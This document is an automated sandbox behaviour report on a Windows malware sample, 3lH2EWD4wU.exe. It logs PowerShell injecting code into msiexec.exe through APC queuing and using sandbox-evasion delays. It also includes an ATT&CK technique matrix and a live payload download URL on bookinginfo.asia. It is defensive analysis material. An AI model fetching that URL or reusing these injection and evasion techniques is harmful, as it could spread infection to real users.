Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6925			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2752			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2032	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5068	Thread sleep count: 572 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5068	Thread sleep time: -5720000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_004062A3 FindFirstFileA,FindClose,	0_2_004062A3
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405768
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	API call chain: ExitProcess graph end node			graph_0-3300
Source: C:\Users\user\Desktop\3lH2EWD4wU.exe	API call chain: ExitProcess graph end node			graph_0-3293

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\3lH2EWD4wU.exe

0_2_0040320C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3lH2EWD4wU.exe	21%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe	21%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.bookinginfo.asia	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.bookinginfo.asia/R	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error	3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.dr	false	URL Reputation: safe	unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.bin~Y	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/mP	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/.asia:443)	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.binv	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/rP	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/www.bookinginfo.asia5	msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.bin;	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/n	msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/Win64;	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/:P	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.bin1	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.dr	false	URL Reputation: safe	unknown
https://www.bookinginfo.asia/www.bookinginfo.asia	msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/dP	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.bineYQ	msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.bin	msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3464521069.0000000023AD0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
